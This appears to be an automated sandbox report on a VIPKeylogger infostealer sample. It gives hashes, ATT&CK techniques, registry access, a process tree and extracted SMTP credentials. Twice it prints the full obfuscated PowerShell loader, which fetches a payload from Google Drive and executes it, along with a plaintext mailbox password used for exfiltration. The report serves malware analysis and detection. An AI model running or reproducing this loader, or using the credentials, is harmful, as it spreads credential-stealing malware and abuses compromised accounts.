vipkeylogger | 66ef9dcb6a5143453daaeced545c270e3a97de89a3289f7e3effce1540135ee0

General

Target

PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs
Size

519KB
MD5

cc7b8ff842d99296d7ec347eb9678e09
SHA1

40f2d2d3747af208c4feaeb51aca9b1dfcb62000
SHA256

66ef9dcb6a5143453daaeced545c270e3a97de89a3289f7e3effce1540135ee0
SHA512

9b6741e1cc073c4ce8709613da986857388e4844a74279f88cf50324f10916c4e052cdd2e485b9c09f5e33b8e603e6a0504899ac670320a636e89ba15a218368
SSDEEP

6144:De/79XfNb0Z1h/csXSWmT9lBiNo4LSrp17wHWmQUnbzN2TxOiSWGIhEmrm5daIug:2Rc1RYnL4WrUHLhn1XW+mr+yrs96g

Score

10^/10

vipkeylogger collection discovery execution keylogger stealer

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.punoterrahotel.com
Port:
587
Username:
[email protected]
Password:
Titikakapu@2023

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.punoterrahotel.com
Port:
587
Username:
[email protected]
Password:
Titikakapu@2023
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 12 IoCs

flow	pid	Process
20	2516	powershell.exe
22	2516	powershell.exe
44	4424	msiexec.exe
46	4424	msiexec.exe
48	4424	msiexec.exe
51	4424	msiexec.exe
52	4424	msiexec.exe
54	4424	msiexec.exe
56	4424	msiexec.exe
60	4424	msiexec.exe
63	4424	msiexec.exe
65	4424	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2516	powershell.exe
4192	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
19	drive.google.com
20	drive.google.com
44	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
53	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4424	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4192	powershell.exe
4424	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2516	powershell.exe
2516	powershell.exe
4192	powershell.exe
4192	powershell.exe
4192	powershell.exe
4424	msiexec.exe
4424	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4192	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	4424	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 2516	2004	WScript.exe	89
PID 2004 wrote to memory of 2516	2004	WScript.exe	89
PID 4192 wrote to memory of 4424	4192	powershell.exe	102
PID 4192 wrote to memory of 4424	4192	powershell.exe	102
PID 4192 wrote to memory of 4424	4192	powershell.exe	102
PID 4192 wrote to memory of 4424	4192	powershell.exe	102

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Skrift Oevrige Forfordeles Tapskruer Madagaskernes Fokkefald #>;$Nephometre39='Resolutioners';<#Garagelejernes Fodboldfusk Deserteringerne dobbelterklringen Corge #>;$Diskede=$Duckweed+$host.UI; function Tahsils69($Arboricultural){If ($Diskede) {$Beaandinger++;}$Specificities=$Tantiemernes+$Arboricultural.'Length'-$Beaandinger; for( $Fiskene236=5;$Fiskene236 -lt $Specificities;$Fiskene236+=6){$Firsporet=$Fiskene236;$Kompromis+=$Arboricultural[$Fiskene236];$Thomistic='acronichally';}$Kompromis;}function Skiftingernes($Sangeres){ & ($Cunctatory) ($Sangeres);}$bindsaalen=Tahsils69 'BevokM BrisoRuggezSynosiAsendlFlagllSude,aImpar/Parac ';$Approvement=Tahsils69 'S lvkTs.bsul,ulphs Fisk1Vvsty2Mus,u ';$Gentries='Enkel[Thi an InduEUpwrit.hodo.Ta.stSDew reCasabrGruppv Achai nsufC Apl,ECosmoPGartnoPal eIBearnnMocamt oncoMOply.AVe isnOvereASisy.GCarruePeripRKonto]Rdste: verf:FlintsOffice ForeCPhospUTa,ksr HypeI ontotE.uxaYPostcpcaptvRk oraOSagt tli etoOctaec Na rOClub LLeont= Opai$ medlaSl grpSclerpV rgiRSkudfoEq ipVSubcre nmarMForgeEForynnGooseTMedic ';$bindsaalen+=Tahsils69 'Ant.b5 Viag.M gne0Telef Sk lk( K ydWS lrei.eplenpapavd DeceoUn,rcw FluesM cro TildmNAx.omT Stor Narko1Snrk,0Shipl.K kis0Shou ; Lnud Vi.dtWAaresiForgrnUdgif6 Emis4Laste;Peric DiktxAnosp6selvh4Vugge;Autoa Pr.cirArte.vManas:Depec1Gype 3S.lam1Kvrul. Mail0Resul)Datas EmotiG ParieAnor.c Fo tkCont.o Regu/ Sekt2Syste0R ste1Enso 0Rygln0E,yth1un rr0 Nara1Umpsr PuzzlFDet.riManipr Udsle Pla fFornaoJeannx f,to/G urm1Decen3fili 1Euphr.Sub.h0Hat h ';$Overflyttere=Tahsils69 ' .ottU S.lfSFer,meP lterSkuml-abacia ulliG J gteUklarN,alpitgener ';$Sugekopperne=Tahsils69 'YndethP,esutForhatWhalep Bryls.reco: Hydr/Cy lo/I dtad popurVen.aiR attvSkride,nsuc.pteryg Ti,oo forso ,arvgFers,lLoveseGynom.Ja.apcR dcloCest mTor,i/Tandlu,ykelcIndka? Sugee Fir x.ugtipDist.oSimplrSemantSer,n=finlid Enheos herwRonsan Ha,nl Thi.o Circa St kdKmpeg&Halmli R,dudFil d=Ru ti1 OppoyJonisYmicrouDrag,DEburiyCameroT.ansQSkibs8List 4,uildUI,ocujF rbrpMicrotmimsyADiskoZTradeOGammeP Mbela ysseY SprojC,embm Pand7 ForkJUlderCZelkoPOvert4 Ungd5kjoler ,angMAktiedIndskyfri.tZUnmat ';$Slnggrebet=Tahsils69 'Int r>Yondd ';$Cunctatory=Tahsils69 'UnconisamplEBecruxDomf ';$Gyroscopically='Rustificeres';$Emmerich='\Caulked.Gau';Skiftingernes (Tahsils69 'Etymo$skarrG Fa blTil ooSjussBUdvana nterLRi,al:VejansBaadtENonmaRBa aiImoo heUncromSusteoMummyrSljtlDSik eEZanzaRStbef= etal$DiathembelfNPu,geVAutom:paragABamlepLen dPUnalidSal aa NonfT Pr,eA Lets+R cta$ Unsye Tr.kmFejltMDisseeFr.nsr KrimIE sisCOilprHTorla ');Skiftingernes (Tahsils69 'Tole $UtilgGB ergl eminofasthb Buyaa,nsnaLTerpe: inguAAppenlProtaFAltsgRMarryIS,areD .lovaFe ng= Etoi$ museSSho mUGu,dag ZoetE Kac.k Pre OUnda p.orvep TjeteSnikbROverpnIllusE Carl.Rdg dSBlodkpAfbanLUenigIHovedtSuper(Yes p$Rebi SB ntaLYecchn DuelgFe tcg.antaR C siEOu.prbF.yspEKn.kvt B ok) Ud,e ');Skiftingernes (Tahsils69 $Gentries);$Sugekopperne=$Alfrida[0];$Forsgsversion=(Tahsils69 ' Demi$AdjurGFawnsLMethooS.rbubDynasaForstlBackl:EnkelMCzariiClubrlApo eIShadoeCalanuElde VSp ngENoncenMetallO,ertI Recog Lav SSvensT ImmoE Uge,1Kilom3Light6Fisk =Vivenn Pro eRemiswTrkvo- ScleOForu BMelo.j BilkEEthiccStankTNippe ,istvsFerreYAplits PoseTKilobE und MHudst.ci.ilnModigEdrawnTGevi,. emb W BeneeMatlybTraumCPraeclSesquiEntiaeUm tynul.ert lob ');Skiftingernes ($Forsgsversion);Skiftingernes (Tahsils69 'Bornh$ WaltMNeutrisovehlUbeskiBygkoeParaquTalmavD ltieSub,dn GonalGreetiOutpogAvnessAsiart Ducke undt1 Prog3Ge le6pi,ap.AdaptHIsogneBlom,a.onnedTekste RremrPuddesB,and[Aandf$He,drODichevF,rrieAr hsrCitr fH poplOgeedyflicktPythotGulereArfberUdsaleSpe,k]Fulic=Einje$NeurobAlarmiTem nnSt.rsdvedrosFisk aPolymaretmalBrahme burgnOpsam ');$filedes=Tahsils69 ' fatt$ Cha MIncasiDriftlN,ndei FradeAnaeruDeli v Tu eeBrillnHyposl eethi Kil,g unmosRich t mstbeElver1Ber.e3.oder6Super.OutcaDremyso Ga twVedkenEnajilMetrooTyph aMrkesdKrustFCon.eiLandglUncrueLystr(tumbl$udenrSSkjoluPlumpgAl ize.udaikToldboNonexpPrincpLiflieDeltirInvarnUn vee.kurk, Geog$IteraSPartsm Deg uLimpetSpinattal.ee bouinSoviedEkspeeOv.rgsRinds)buega ';$Smuttendes=$Seriemorder;Skiftingernes (Tahsils69 'Emira$ onsGForsklUnproOMusteBAsiliAOmkril Cloc:Hov de AnispPaillHLeve,iEbenmaanetaLIdrtsttvan e MillSGuzzl=Levee( oocyTRespeeeksils T ctt F.st- GigapBruneAKrammTBookmHPhoto eltz$Nachisrev,rmEpoxyUBge,etAntimtAlfrieLongeN RabadSm rteQuadrsN igh)Flusm ');while (!$Ephialtes) {Skiftingernes (Tahsils69 ' Alig$ParasgBaadflUrsi,oIsbjrbUnantaDestalPolen: rvefROverke egynj ernrnStorthSrskraB rner,nurrd PinctOutgr=Indeh$ ElsktOmlberleachu Breme.orve ') ;Skiftingernes $filedes;Skiftingernes (Tahsils69 'Mormos Apo tstyrbAForurrruge tHorn -AntipSOrthoL RecoEUn ubeEscapPGrund Utili4Berth ');Skiftingernes (Tahsils69 'Numer$IndkvGWithaLFla oOFluctB ClanARein lBvskb:TigreEcrowsPSisteh nonri ,andaStedblBedfoT Profe K.mpsUnder=under(.ubinTBrstee LongSSociaTNontr-TrigopArdesAKm.ehTSkandhcleis Maris$ Skovs antiM As ouHapsetPro,lt chefe KommN IagtdKosmee MallsBog r)Psalt ') ;Skiftingernes (Tahsils69 'Egens$maretgNixtaLUnte,OVigtib.baadaPletfl eakt:Gaduil For YMgledSSprino NonngSolenEOppo N VideiForbeSIro naOkse TTvrorIAnthoOMagtanadipo=Kedle$ navg aft lGrovdO ValvBNasilA DiaclBlodc: hereAclytuTVelityKyletPFreskyApocy+Funkl+Inwin%Antis$Co opa impLledelF F rlRShrewIReconD RohuaRhyme.VredeCdam eOPyramuHjspnn petiTSeksu ') ;$Sugekopperne=$Alfrida[$Lysogenisation];}$Enthronizations=287436;$Octopean=30416;Skiftingernes (Tahsils69 'Varie$ UssegOrbi,l Par oReed.bFam eAFiskeLReboa:As arPafba aDentiR raadi godtDGaussi thu,Gpennii G neT InceAAfhjetKulrteC,pel P.lla=Bambo AuratgFr,cteA skaT Over-P,ychCTrochoKarbunLnforTEnroueSkrivnFrecktAftop Met.$ StegS Hexam p stUFortat orriTOrnitEFatt,nVir sDGeronEPerissIdent ');Skiftingernes (Tahsils69 'B sts$SiksagfetollSnorkoBa abbIndfla Ventl Fraa:InvalDVi tuuPladeuPagurmDy sevDreidi MalarPer c nonv=Outma De in[Hist Sci ary RumosEkspetAfbeteDendrmcoaku.AnaloC FuruoForbin NonbvGemineSprngrDonketInter]Unb c:Met,y: Prs,FElevar I.isoMaft,mP.ovoBGrowna Trnisrespee Kyst6 Adin4anburS jrnetLic nrOptlliOps gnHeinog Repl(Kaffe$Gl,pbPOv.gla Poorr .ubtiseddedKuppei KsengDribliSexortBeundaCo detP pire Skra)S nge ');Skiftingernes (Tahsils69 'Ouphe$ hamgMethaLTempeoApotebPantea rintlBi um:Di sifUn.erRErstaeHernsmS,ackd elwrHyppiACottoGServeNSuperiForbrNInddaGAlimeEDagvrNforsvsSier, Afkb=Mesod Stork[Anon SSkrifyMon cS ,obbt KontEM losMTrust.C lomtM dvgeDyrknXPapactFo me.Dea eEBa ginFd,enC erchoVin lD StapiUnlein HilsGRen,a]A,can:Tilst:ProtoAMonoxsAktioCClangINoancI ,epa. CopoGSn.ppeE genT Anons saliTGkkerRMetali voluNDrikkG flor(Misbe$O teiDStridUProseUSle.tMSskenVP.palIMalikr udp )Barba ');Skiftingernes (Tahsils69 'Dubhe$Studig StraLVektooregelBTestaaTilreLTerce: St ujHesteenit oPMe orpProvoeAft nsS turECellanHoppl=Nom n$CountftailoRNonpre AcinmForudD Softr HelpaLobbyGSkrupnWordlI Arb.NQuadrGRealle ju en nswaSFor,l. TrumsObli uLuxemBAbernsJackaTp ilorDevelI ndatNBes.ig m nu( Kano$Und reF,rann G llt HovehSolisr BrndO ReesnBo arIRebroZPlaneaSkrektNewsrI UnreOSlutkNNawabsP att, Onse$Swo.doB nniCDistet gilcO M.ssp SfyreHorosaNo senK rma)Ulfbj ');Skiftingernes $Jeppesen;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2516

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skrift Oevrige Forfordeles Tapskruer Madagaskernes Fokkefald #>;$Nephometre39='Resolutioners';<#Garagelejernes Fodboldfusk Deserteringerne dobbelterklringen Corge #>;$Diskede=$Duckweed+$host.UI; function Tahsils69($Arboricultural){If ($Diskede) {$Beaandinger++;}$Specificities=$Tantiemernes+$Arboricultural.'Length'-$Beaandinger; for( $Fiskene236=5;$Fiskene236 -lt $Specificities;$Fiskene236+=6){$Firsporet=$Fiskene236;$Kompromis+=$Arboricultural[$Fiskene236];$Thomistic='acronichally';}$Kompromis;}function Skiftingernes($Sangeres){ & ($Cunctatory) ($Sangeres);}$bindsaalen=Tahsils69 'BevokM BrisoRuggezSynosiAsendlFlagllSude,aImpar/Parac ';$Approvement=Tahsils69 'S lvkTs.bsul,ulphs Fisk1Vvsty2Mus,u ';$Gentries='Enkel[Thi an InduEUpwrit.hodo.Ta.stSDew reCasabrGruppv Achai nsufC Apl,ECosmoPGartnoPal eIBearnnMocamt oncoMOply.AVe isnOvereASisy.GCarruePeripRKonto]Rdste: verf:FlintsOffice ForeCPhospUTa,ksr HypeI ontotE.uxaYPostcpcaptvRk oraOSagt tli etoOctaec Na rOClub LLeont= Opai$ medlaSl grpSclerpV rgiRSkudfoEq ipVSubcre nmarMForgeEForynnGooseTMedic ';$bindsaalen+=Tahsils69 'Ant.b5 Viag.M gne0Telef Sk lk( K ydWS lrei.eplenpapavd DeceoUn,rcw FluesM cro TildmNAx.omT Stor Narko1Snrk,0Shipl.K kis0Shou ; Lnud Vi.dtWAaresiForgrnUdgif6 Emis4Laste;Peric DiktxAnosp6selvh4Vugge;Autoa Pr.cirArte.vManas:Depec1Gype 3S.lam1Kvrul. Mail0Resul)Datas EmotiG ParieAnor.c Fo tkCont.o Regu/ Sekt2Syste0R ste1Enso 0Rygln0E,yth1un rr0 Nara1Umpsr PuzzlFDet.riManipr Udsle Pla fFornaoJeannx f,to/G urm1Decen3fili 1Euphr.Sub.h0Hat h ';$Overflyttere=Tahsils69 ' .ottU S.lfSFer,meP lterSkuml-abacia ulliG J gteUklarN,alpitgener ';$Sugekopperne=Tahsils69 'YndethP,esutForhatWhalep Bryls.reco: Hydr/Cy lo/I dtad popurVen.aiR attvSkride,nsuc.pteryg Ti,oo forso ,arvgFers,lLoveseGynom.Ja.apcR dcloCest mTor,i/Tandlu,ykelcIndka? Sugee Fir x.ugtipDist.oSimplrSemantSer,n=finlid Enheos herwRonsan Ha,nl Thi.o Circa St kdKmpeg&Halmli R,dudFil d=Ru ti1 OppoyJonisYmicrouDrag,DEburiyCameroT.ansQSkibs8List 4,uildUI,ocujF rbrpMicrotmimsyADiskoZTradeOGammeP Mbela ysseY SprojC,embm Pand7 ForkJUlderCZelkoPOvert4 Ungd5kjoler ,angMAktiedIndskyfri.tZUnmat ';$Slnggrebet=Tahsils69 'Int r>Yondd ';$Cunctatory=Tahsils69 'UnconisamplEBecruxDomf ';$Gyroscopically='Rustificeres';$Emmerich='\Caulked.Gau';Skiftingernes (Tahsils69 'Etymo$skarrG Fa blTil ooSjussBUdvana nterLRi,al:VejansBaadtENonmaRBa aiImoo heUncromSusteoMummyrSljtlDSik eEZanzaRStbef= etal$DiathembelfNPu,geVAutom:paragABamlepLen dPUnalidSal aa NonfT Pr,eA Lets+R cta$ Unsye Tr.kmFejltMDisseeFr.nsr KrimIE sisCOilprHTorla ');Skiftingernes (Tahsils69 'Tole $UtilgGB ergl eminofasthb Buyaa,nsnaLTerpe: inguAAppenlProtaFAltsgRMarryIS,areD .lovaFe ng= Etoi$ museSSho mUGu,dag ZoetE Kac.k Pre OUnda p.orvep TjeteSnikbROverpnIllusE Carl.Rdg dSBlodkpAfbanLUenigIHovedtSuper(Yes p$Rebi SB ntaLYecchn DuelgFe tcg.antaR C siEOu.prbF.yspEKn.kvt B ok) Ud,e ');Skiftingernes (Tahsils69 $Gentries);$Sugekopperne=$Alfrida[0];$Forsgsversion=(Tahsils69 ' Demi$AdjurGFawnsLMethooS.rbubDynasaForstlBackl:EnkelMCzariiClubrlApo eIShadoeCalanuElde VSp ngENoncenMetallO,ertI Recog Lav SSvensT ImmoE Uge,1Kilom3Light6Fisk =Vivenn Pro eRemiswTrkvo- ScleOForu BMelo.j BilkEEthiccStankTNippe ,istvsFerreYAplits PoseTKilobE und MHudst.ci.ilnModigEdrawnTGevi,. emb W BeneeMatlybTraumCPraeclSesquiEntiaeUm tynul.ert lob ');Skiftingernes ($Forsgsversion);Skiftingernes (Tahsils69 'Bornh$ WaltMNeutrisovehlUbeskiBygkoeParaquTalmavD ltieSub,dn GonalGreetiOutpogAvnessAsiart Ducke undt1 Prog3Ge le6pi,ap.AdaptHIsogneBlom,a.onnedTekste RremrPuddesB,and[Aandf$He,drODichevF,rrieAr hsrCitr fH poplOgeedyflicktPythotGulereArfberUdsaleSpe,k]Fulic=Einje$NeurobAlarmiTem nnSt.rsdvedrosFisk aPolymaretmalBrahme burgnOpsam ');$filedes=Tahsils69 ' fatt$ Cha MIncasiDriftlN,ndei FradeAnaeruDeli v Tu eeBrillnHyposl eethi Kil,g unmosRich t mstbeElver1Ber.e3.oder6Super.OutcaDremyso Ga twVedkenEnajilMetrooTyph aMrkesdKrustFCon.eiLandglUncrueLystr(tumbl$udenrSSkjoluPlumpgAl ize.udaikToldboNonexpPrincpLiflieDeltirInvarnUn vee.kurk, Geog$IteraSPartsm Deg uLimpetSpinattal.ee bouinSoviedEkspeeOv.rgsRinds)buega ';$Smuttendes=$Seriemorder;Skiftingernes (Tahsils69 'Emira$ onsGForsklUnproOMusteBAsiliAOmkril Cloc:Hov de AnispPaillHLeve,iEbenmaanetaLIdrtsttvan e MillSGuzzl=Levee( oocyTRespeeeksils T ctt F.st- GigapBruneAKrammTBookmHPhoto eltz$Nachisrev,rmEpoxyUBge,etAntimtAlfrieLongeN RabadSm rteQuadrsN igh)Flusm ');while (!$Ephialtes) {Skiftingernes (Tahsils69 ' Alig$ParasgBaadflUrsi,oIsbjrbUnantaDestalPolen: rvefROverke egynj ernrnStorthSrskraB rner,nurrd PinctOutgr=Indeh$ ElsktOmlberleachu Breme.orve ') ;Skiftingernes $filedes;Skiftingernes (Tahsils69 'Mormos Apo tstyrbAForurrruge tHorn -AntipSOrthoL RecoEUn ubeEscapPGrund Utili4Berth ');Skiftingernes (Tahsils69 'Numer$IndkvGWithaLFla oOFluctB ClanARein lBvskb:TigreEcrowsPSisteh nonri ,andaStedblBedfoT Profe K.mpsUnder=under(.ubinTBrstee LongSSociaTNontr-TrigopArdesAKm.ehTSkandhcleis Maris$ Skovs antiM As ouHapsetPro,lt chefe KommN IagtdKosmee MallsBog r)Psalt ') ;Skiftingernes (Tahsils69 'Egens$maretgNixtaLUnte,OVigtib.baadaPletfl eakt:Gaduil For YMgledSSprino NonngSolenEOppo N VideiForbeSIro naOkse TTvrorIAnthoOMagtanadipo=Kedle$ navg aft lGrovdO ValvBNasilA DiaclBlodc: hereAclytuTVelityKyletPFreskyApocy+Funkl+Inwin%Antis$Co opa impLledelF F rlRShrewIReconD RohuaRhyme.VredeCdam eOPyramuHjspnn petiTSeksu ') ;$Sugekopperne=$Alfrida[$Lysogenisation];}$Enthronizations=287436;$Octopean=30416;Skiftingernes (Tahsils69 'Varie$ UssegOrbi,l Par oReed.bFam eAFiskeLReboa:As arPafba aDentiR raadi godtDGaussi thu,Gpennii G neT InceAAfhjetKulrteC,pel P.lla=Bambo AuratgFr,cteA skaT Over-P,ychCTrochoKarbunLnforTEnroueSkrivnFrecktAftop Met.$ StegS Hexam p stUFortat orriTOrnitEFatt,nVir sDGeronEPerissIdent ');Skiftingernes (Tahsils69 'B sts$SiksagfetollSnorkoBa abbIndfla Ventl Fraa:InvalDVi tuuPladeuPagurmDy sevDreidi MalarPer c nonv=Outma De in[Hist Sci ary RumosEkspetAfbeteDendrmcoaku.AnaloC FuruoForbin NonbvGemineSprngrDonketInter]Unb c:Met,y: Prs,FElevar I.isoMaft,mP.ovoBGrowna Trnisrespee Kyst6 Adin4anburS jrnetLic nrOptlliOps gnHeinog Repl(Kaffe$Gl,pbPOv.gla Poorr .ubtiseddedKuppei KsengDribliSexortBeundaCo detP pire Skra)S nge ');Skiftingernes (Tahsils69 'Ouphe$ hamgMethaLTempeoApotebPantea rintlBi um:Di sifUn.erRErstaeHernsmS,ackd elwrHyppiACottoGServeNSuperiForbrNInddaGAlimeEDagvrNforsvsSier, Afkb=Mesod Stork[Anon SSkrifyMon cS ,obbt KontEM losMTrust.C lomtM dvgeDyrknXPapactFo me.Dea eEBa ginFd,enC erchoVin lD StapiUnlein HilsGRen,a]A,can:Tilst:ProtoAMonoxsAktioCClangINoancI ,epa. CopoGSn.ppeE genT Anons saliTGkkerRMetali voluNDrikkG flor(Misbe$O teiDStridUProseUSle.tMSskenVP.palIMalikr udp )Barba ');Skiftingernes (Tahsils69 'Dubhe$Studig StraLVektooregelBTestaaTilreLTerce: St ujHesteenit oPMe orpProvoeAft nsS turECellanHoppl=Nom n$CountftailoRNonpre AcinmForudD Softr HelpaLobbyGSkrupnWordlI Arb.NQuadrGRealle ju en nswaSFor,l. TrumsObli uLuxemBAbernsJackaTp ilorDevelI ndatNBes.ig m nu( Kano$Und reF,rann G llt HovehSolisr BrndO ReesnBo arIRebroZPlaneaSkrektNewsrI UnreOSlutkNNawabsP att, Onse$Swo.doB nniCDistet gilcO M.ssp SfyreHorosaNo senK rma)Ulfbj ');Skiftingernes $Jeppesen;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:4424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4w422xql.bvf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Caulked.Gau

Filesize
413KB

MD5
5a6cfd115836d3e0d5856ac02d979d0a

SHA1
b72005718e507cd290b2621d7ce694b6777a4868

SHA256
5dca1926b6911b6ad9333f3aa562b1eec7309c65204048baff4d579dd1232a47

SHA512
1f7333d7c43b99cef984618f04c725dd0ece495f6ed33f15b00869ef095ecb922d97ec57db6488ebba4d5af6a97df3c97a62e76485fa4ef83b5676da9819365d

Download Submit
memory/2516-10-0x00000233F0D80000-0x00000233F0DA2000-memory.dmp

Filesize
136KB

Download
memory/2516-11-0x00007FFD4E490000-0x00007FFD4EF51000-memory.dmp

Filesize
10.8MB

Download
memory/2516-12-0x00007FFD4E490000-0x00007FFD4EF51000-memory.dmp

Filesize
10.8MB

Download
memory/2516-15-0x00007FFD4E493000-0x00007FFD4E495000-memory.dmp

Filesize
8KB

Download
memory/2516-16-0x00007FFD4E490000-0x00007FFD4EF51000-memory.dmp

Filesize
10.8MB

Download
memory/2516-17-0x00007FFD4E490000-0x00007FFD4EF51000-memory.dmp

Filesize
10.8MB

Download
memory/2516-20-0x00007FFD4E490000-0x00007FFD4EF51000-memory.dmp

Filesize
10.8MB

Download
memory/2516-0-0x00007FFD4E493000-0x00007FFD4E495000-memory.dmp

Filesize
8KB

Download
memory/4192-37-0x00000000064C0000-0x00000000064DE000-memory.dmp

Filesize
120KB

Download
memory/4192-43-0x0000000008950000-0x0000000008EF4000-memory.dmp

Filesize
5.6MB

Download
memory/4192-25-0x0000000005E80000-0x0000000005EE6000-memory.dmp

Filesize
408KB

Download
memory/4192-35-0x0000000005EF0000-0x0000000006244000-memory.dmp

Filesize
3.3MB

Download
memory/4192-23-0x0000000005600000-0x0000000005622000-memory.dmp

Filesize
136KB

Download
memory/4192-22-0x0000000005720000-0x0000000005D48000-memory.dmp

Filesize
6.2MB

Download
memory/4192-38-0x0000000006550000-0x000000000659C000-memory.dmp

Filesize
304KB

Download
memory/4192-39-0x0000000007D20000-0x000000000839A000-memory.dmp

Filesize
6.5MB

Download
memory/4192-40-0x0000000006A50000-0x0000000006A6A000-memory.dmp

Filesize
104KB

Download
memory/4192-41-0x0000000007740000-0x00000000077D6000-memory.dmp

Filesize
600KB

Download
memory/4192-42-0x00000000076D0000-0x00000000076F2000-memory.dmp

Filesize
136KB

Download
memory/4192-24-0x00000000056A0000-0x0000000005706000-memory.dmp

